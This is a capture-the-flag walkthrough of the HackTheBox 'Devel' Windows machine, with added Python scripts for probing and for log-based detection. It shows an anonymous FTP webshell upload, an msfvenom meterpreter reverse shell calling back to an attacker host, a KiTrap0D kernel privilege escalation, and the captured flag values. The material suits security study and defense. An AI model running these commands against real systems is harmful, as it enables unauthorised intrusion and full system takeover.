Devel

22 September 2019

Starting information

Machine IP: 10.10.10.5
System: Windows

Network enumeration

I start by adding an entry to my /etc/hosts file so I don't have to type the IP every time:

10.10.10.5 devel

Then I look for open ports with a full TCP port scan (-p- covers all 65535 ports; -Pn skips host discovery, since Windows hosts often drop ICMP) and, in parallel, start an OpenVAS scan:

nmap -p- devel -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 21:03 CEST
Nmap scan report for devel (10.10.10.5)
Host is up (0.034s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 105.86 seconds

Now I run nmap's service detection and default scripts (-sV -sC) against the two open ports to gather more information:

Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 21:17 CEST
Nmap scan report for devel (10.10.10.5)
Host is up (0.033s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.50 seconds

Information gathered

My OpenVAS scan has finished; from nmap and OpenVAS, here is what I know:

Operating System

Windows

Open ports

Port  Service
21    ftp (Microsoft ftpd)
80    Microsoft IIS httpd 7.5

Vulnerabilities

CVE            Service  Description                                                              Severity
CVE-2015-1635  IIS      MS15-034 HTTP.sys Remote Code Execution Vulnerability (remote check)     High
none           FTP      Anonymous FTP Login Reporting                                            Medium
none           IIS      Microsoft IIS Default Welcome Page Information Disclosure Vulnerability  Medium
CVE-2010-3332  IIS      Microsoft ASP.NET Information Disclosure Vulnerability (2418042)         Medium
none           FTP      FTP Unencrypted Cleartext Login                                          Medium

Exploits

Now that I have a list of CVEs, I can check whether Metasploit has modules for them. I start Metasploit with msfconsole and search for the first CVE:

msf5 > search 2015-1635

Matching Modules
================

   #  Name                                                  Disclosure Date  Rank    Check  Description
   -  ----                                                  ---------------  ----    -----  -----------
   0  auxiliary/dos/http/ms15_034_ulonglongadd                               normal  Yes    MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
   1  auxiliary/scanner/http/ms15_034_http_sys_memory_dump                   normal  Yes    MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure

Metasploit only has auxiliary modules for MS15-034: a denial-of-service and a memory-disclosure check. Neither gives code execution, so neither can get me the flags. Let's recap what I have at my disposal:

  • an IIS server
  • an anonymous ftp access

The anonymous FTP account can download files, and what it lists (aspnet_client, iisstart.htm, welcome.png) is the default content of an IIS 7 web root, so the FTP root is almost certainly the site's document root. If anonymous can also write there, anything I upload becomes reachable over HTTP, and a .aspx file will be executed by the ASP.NET handler rather than served as text. I should be able to push a webshell and call it through the web server.

First I take a standard ASPX webshell from the ones shipped with my Parrot distribution:

cp /usr/share/webshells/aspx/cmdasp.aspx  .

Then I push it to the server through the anonymous FTP session:

ftp devel
Connected to devel.
220 Microsoft FTP Service
Name (devel:braincoke): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put cmdasp.aspx
local: cmdasp.aspx remote: cmdasp.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1442 bytes sent in 0.00 secs (12.3892 MB/s)
ftp>

Now I can open http://10.10.10.5/cmdasp.aspx and send commands through the form, which confirms that the FTP root is the web root. Running whoami returns iis apppool\web: the site's application pool identity, a low-privilege account, so privilege escalation will be needed later.
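Before dropping a webshell, a practitioner would want to confirm two things with a harmless marker file: that the anonymous account can write, and that the FTP root really is the web root (a 200 for a default page proves nothing; the body must contain the marker). The script below is an added example and not part of the original write-up. It assumes the devel entry from /etc/hosts above and that the site is served on port 80; the InMemoryFtp class and serve_from helper are offline stand-ins so the check can be exercised without a target.

```python
"""Is the anonymous FTP root the IIS web root? Added example, not from the write-up."""
from __future__ import annotations

import ftplib
import io
import secrets
import urllib.error
import urllib.request


def default_http_get(url: str, timeout: float = 5.0) -> tuple[int, bytes]:
    """Fetch url and return (status, body); HTTP error codes are returned, not raised."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as e:
        return e.code, b""


def check_ftp_webroot(ftp, base_url: str, http_get=default_http_get, cleanup: bool = True) -> str:
    """Upload a random marker file over FTP, then ask the web server for it.

    ftp must be a logged-in ftplib.FTP (or an object with the same storbinary/delete methods).
    Returns "not-writable", "writable-not-served" or "webroot".
    """
    # Random name and content: no collision with real files, and a body the
    # web server cannot return by accident.
    name = f"probe-{secrets.token_hex(4)}.txt"
    marker = secrets.token_hex(16).encode()
    try:
        ftp.storbinary(f"STOR {name}", io.BytesIO(marker))
    except ftplib.error_perm:
        return "not-writable"
    try:
        status, body = http_get(f"{base_url.rstrip('/')}/{name}")
    finally:
        if cleanup:  # leave nothing behind, whatever the HTTP side did
            try:
                ftp.delete(name)
            except ftplib.error_perm:
                pass
    return "webroot" if status == 200 and marker in body else "writable-not-served"


class InMemoryFtp:
    """Offline stand-in for ftplib.FTP so the check can be exercised without a target."""

    def __init__(self, writable: bool = True):
        self.writable = writable
        self.files: dict[str, bytes] = {}

    def storbinary(self, cmd: str, fp) -> None:
        if not self.writable:
            raise ftplib.error_perm("550 Access is denied.")
        self.files[cmd.split(" ", 1)[1]] = fp.read()

    def delete(self, name: str) -> None:
        self.files.pop(name, None)


def serve_from(ftp: InMemoryFtp, served: bool = True):
    """http_get that serves the fake FTP root (served=True) or a site that does not share it."""
    def http_get(url: str) -> tuple[int, bytes]:
        name = url.rsplit("/", 1)[1]
        if served and name in ftp.files:
            return 200, ftp.files[name]
        return 404, b""
    return http_get


if __name__ == "__main__":
    # Live run against the write-up's target; "devel" is the /etc/hosts entry from above.
    with ftplib.FTP("devel", timeout=10) as ftp:
        ftp.login()  # anonymous login, as in the write-up
        print(check_ftp_webroot(ftp, "http://devel/"))
```

The three outcomes matter differently: "not-writable" means the webshell route is closed, "writable-not-served" means the FTP root is some other directory (still useful for dropping payloads, but not for execution through IIS), and "webroot" is the situation on this box.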

Getting a better shell

Using the shell through the form is impractical. To be more comfortable I will use a reverse shell generated with msfvenom.

First I generate the payload. It is a reverse shell, so it connects back to my machine (10.10.14.4) on port 4444, where I will be listening. I pick a 32-bit windows/ payload, which runs on both 32-bit and 64-bit Windows, since I don't know the architecture yet:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe > shell.exe

Next I upload the executable over the same FTP session. I make sure to switch the transfer type to binary first; in ASCII mode the client would rewrite line endings and corrupt the .exe:

Connected to devel.
220 Microsoft FTP Service
Name (devel:braincoke): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> binary
200 Type set to I.
ftp> put shell.exe
local: shell.exe remote: shell.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
73802 bytes sent in 0.07 secs (1.0353 MB/s)

Now I start msfconsole and a listener with exploit/multi/handler. The handler's PAYLOAD must match what msfvenom generated, otherwise the stager connects but never receives its second stage:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.4
LHOST => 10.10.14.4
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.0.2.15:4444

My listener is started. I execute the payload by submitting C:\inetpub\wwwroot\shell.exe as the command in the webshell form (the FTP root maps to C:\inetpub\wwwroot, so that is where the upload landed). Immediately, I see my listener receive the connection:

[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.10.5:49158) at 2019-09-29 17:31:48 +0200

meterpreter > ls
Listing: c:\windows\system32\inetsrv
====================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100666/rw-rw-rw-  138752   fil   2009-07-14 02:11:35 +0200  AppHostNavigators.dll
100777/rwxrwxrwx  125440   fil   2009-07-14 02:10:51 +0200  InetMgr.exe
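Seen from the defender's side, the chain so far leaves two traces that belong together: an FTP STOR of server-side executable content by the anonymous account, then HTTP requests for the same file name. The detector below is an added example and not code from the write-up. It parses IIS's W3C-format FTP and HTTP logs by their #Fields: directive and correlates each upload with the first later request for that file. The log lines are constructed to mirror the session above; the exact column set is an assumption (real IIS logs may carry more columns, which the parser tolerates because it reads the header).

```python
"""Spot a webshell dropped over anonymous FTP in IIS logs. Added example, not from the write-up."""
from __future__ import annotations

import posixpath
from dataclasses import dataclass
from typing import Iterator

# Names IIS or Windows would execute rather than serve as static content.
EXEC_EXT = {".aspx", ".asp", ".ashx", ".asmx", ".asax", ".exe", ".dll", ".bat", ".ps1"}


def parse_w3c(text: str) -> Iterator[dict[str, str]]:
    """Yield one dict per data line of a W3C extended log.

    Column names come from the #Fields: directive, so the same parser handles
    the FTP and HTTP logs and whatever column set the server was told to write.
    """
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        if fields is None:
            raise ValueError("data line before #Fields: directive")
        values = line.split(" ")  # W3C encodes spaces inside values as '+'
        if len(values) != len(fields):
            continue  # truncated line: skip rather than mis-align columns
        yield dict(zip(fields, values))


@dataclass
class Finding:
    uploaded_at: str
    client: str
    user: str
    filename: str
    completed: bool            # STOR got a 2xx reply; 550 means the write was refused
    executed_at: str | None    # first HTTP request for the same file after the upload


def find_webshell_drops(ftp_log: str, http_log: str) -> list[Finding]:
    """Pair FTP STORs of executable content with later HTTP requests for that file."""
    http_rows = list(parse_w3c(http_log))
    findings: list[Finding] = []
    for row in parse_w3c(ftp_log):
        if row.get("cs-method", "").upper() != "STOR":
            continue
        name = posixpath.basename(row.get("cs-uri-stem", ""))
        if posixpath.splitext(name)[1].lower() not in EXEC_EXT:
            continue
        when = f"{row['date']} {row['time']}"
        hit = next(
            (f"{h['date']} {h['time']}" for h in http_rows
             if posixpath.basename(h.get("cs-uri-stem", "")).lower() == name.lower()
             and f"{h['date']} {h['time']}" >= when),  # ISO timestamps compare as strings
            None,
        )
        findings.append(Finding(when, row.get("c-ip", "-"), row.get("cs-username", "-").lower(),
                                name, row.get("sc-status", "").startswith("2"), hit))
    return findings


def severity(f: Finding) -> str:
    if f.user == "anonymous" and f.executed_at:
        return "critical"  # unauthenticated upload that the web server then ran
    if f.user == "anonymous" or f.executed_at:
        return "high"
    return "medium" if f.completed else "low"


# Constructed sample logs shaped like the session in this write-up (not real server logs).
FTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status
2019-09-22 19:30:01 10.10.14.4 - 10.10.10.5 21 USER anonymous 331 0
2019-09-22 19:30:02 10.10.14.4 anonymous 10.10.10.5 21 PASS *** 230 0
2019-09-22 19:30:05 10.10.14.4 anonymous 10.10.10.5 21 RETR iisstart.htm 226 0
2019-09-22 19:30:10 10.10.14.4 anonymous 10.10.10.5 21 STOR cmdasp.aspx 226 0
2019-09-22 19:35:00 10.10.14.4 anonymous 10.10.10.5 21 STOR shell.exe 226 0
2019-09-22 19:40:00 10.10.14.9 anonymous 10.10.10.5 21 STOR notes.txt 226 0
"""
HTTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2019-09-22 19:29:00 10.10.10.5 GET /welcome.png - 80 - 10.10.14.4 Mozilla/5.0 200 0 0 3
2019-09-22 19:30:40 10.10.10.5 GET /cmdasp.aspx - 80 - 10.10.14.4 Mozilla/5.0 200 0 0 15
2019-09-22 19:30:55 10.10.10.5 POST /cmdasp.aspx - 80 - 10.10.14.4 Mozilla/5.0 200 0 0 200
"""

if __name__ == "__main__":
    for f in find_webshell_drops(FTP_LOG, HTTP_LOG):
        print(severity(f), f)
```

On the sample, cmdasp.aspx is reported as critical (anonymous upload, then requested over HTTP thirty seconds later) and shell.exe as high (anonymous upload, never requested: it was launched by the webshell, not by IIS, so the HTTP log cannot see it). The RETR and the .txt upload produce nothing.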

Getting root

With my new meterpreter session, let's get more information about the system:

meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows
meterpreter >

I can try getsystem to escalate to NT AUTHORITY\SYSTEM. In my case it didn't work: the three techniques it tries all require local administrator rights, which the application pool identity does not have.

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

I will have to try other ways to get my privilege escalation. A good list can be found here.

After trying multiple things, and keeping in mind that I am targeting a 32-bit Windows 7 at build 7600 (the RTM release, without SP1), I decided to try windows/local/ms10_015_kitrap0d. MS10-015 (KiTrap0D, CVE-2010-0232) is a kernel privilege escalation in the 32-bit VDM support that only affects x86 Windows, which matches this host. Instead of guessing, Metasploit's post/multi/recon/local_exploit_suggester can be run against the session to produce a shortlist of candidates like this one.
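Kernel exploits can crash the target, so a practitioner would shortlist candidates from the host's build, architecture and installed hotfixes before firing any; systeminfo on the target reports all three. The script below is an added example and not the write-up's method: it parses systeminfo output and checks it against a small table of Windows 7 privilege-escalation candidates, with KB numbers taken from the corresponding Microsoft bulletins (SP1, build 7601, ships with the 2010 fixes, so it counts as patched for those). The two systeminfo samples are constructed in the shape of real output; the first mimics this box.

```python
"""Shortlist Windows 7 kernel LPE candidates from systeminfo output. Added example, not from the write-up."""
from __future__ import annotations

import re
from dataclasses import dataclass, field


@dataclass
class HostInfo:
    major: int = 0
    minor: int = 0
    build: int = 0
    arch: str = "x86"
    hotfixes: set[str] = field(default_factory=set)


def parse_systeminfo(text: str) -> HostInfo:
    """Pull version, architecture and installed KBs out of `systeminfo` text."""
    info = HostInfo()
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"OS Version:\s+(\d+)\.(\d+)\.(\d+)", line)
        if m:
            info.major, info.minor, info.build = (int(x) for x in m.groups())
            continue
        m = re.match(r"System Type:\s+(\S+)", line)
        if m:  # "X86-based PC" or "x64-based PC"
            info.arch = "x64" if "x64" in m.group(1).lower() else "x86"
            continue
        m = re.search(r"\[\d+\]:\s*(KB\d+)", line, re.IGNORECASE)  # "[01]: KB977165"
        if m:
            info.hotfixes.add(m.group(1).upper())
    return info


@dataclass(frozen=True)
class Candidate:
    bulletin: str
    kb: str                       # hotfix that closes the hole
    x86_only: bool
    fixed_from_build: int | None  # first Windows 7 build shipping the fix (SP1 = 7601), None if no SP includes it
    msf_module: str | None


# KB numbers from the Microsoft bulletins; only MS10-015 is used in this write-up.
WIN7_CANDIDATES = (
    Candidate("MS10-015 KiTrap0D", "KB977165", True, 7601, "exploit/windows/local/ms10_015_kitrap0d"),
    Candidate("MS10-092 Task Scheduler", "KB2305420", False, 7601, "exploit/windows/local/ms10_092_schelevator"),
    Candidate("MS11-046 afd.sys", "KB2503665", False, None, None),
)


def shortlist(info: HostInfo) -> list[Candidate]:
    """Candidates whose architecture matches and whose fix is not installed."""
    if (info.major, info.minor) != (6, 1):
        return []  # the table above only covers Windows 7 / 2008 R2
    out = []
    for c in WIN7_CANDIDATES:
        if c.x86_only and info.arch != "x86":
            continue
        if c.kb in info.hotfixes:
            continue
        if c.fixed_from_build is not None and info.build >= c.fixed_from_build:
            continue
        out.append(c)
    return out


# Constructed samples in the shape of `systeminfo` output (not captured from a real host).
SAMPLE_UNPATCHED_X86 = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 N/A
"""
SAMPLE_PATCHED_X64 = """\
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2503665
                           [02]: KB976932
"""

if __name__ == "__main__":
    for c in shortlist(parse_systeminfo(SAMPLE_UNPATCHED_X86)):
        print(c.bulletin, c.kb, c.msf_module or "(no Metasploit module, standalone exploit)")
```

The shortlist is a filter, not a guarantee: it rules candidates out by architecture and patch state, and what remains still has to be tried, ideally the ones with the lowest chance of a blue screen first.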

To configure the exploit I first set my current shell in the background:

meterpreter > background
[*] Backgrounding session 1...

Then I select the exploit with use windows/local/ms10_015_kitrap0d and configure it: SESSION is the backgrounded meterpreter session it will run through, and LHOST/LPORT are where the new, privileged session should call back:

msf5 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.4
LHOST => 10.10.14.4
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LPORT 4444
LPORT => 4444

Finally I can run the exploit:

msf5 exploit(windows/local/ms10_015_kitrap0d) > run

The first attempt fails, but kernel exploits of this kind are not fully reliable and sometimes need to be run more than once. After a few more tries I get my privilege escalation:

[*] Started reverse TCP handler on 10.10.14.4:4444
[*] Launching notepad to host the exploit...
[+] Process 2384 launched.
[*] Reflectively injecting the exploit DLL into 2384...
[*] Injecting exploit into 2384 ...
[*] Exploit injected. Injecting payload into 2384...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 3 opened (10.10.14.4:4444 -> 10.10.10.5:49158) at 2019-09-29 18:33:36 +0200

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Now getting the flags is a piece of cake:

meterpreter > cat C:/Users/Administrator/Desktop/root.txt.txt
e621a0b5041708797c4fc4728bc72b4b

meterpreter > cat C:/Users/babis/Desktop/user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8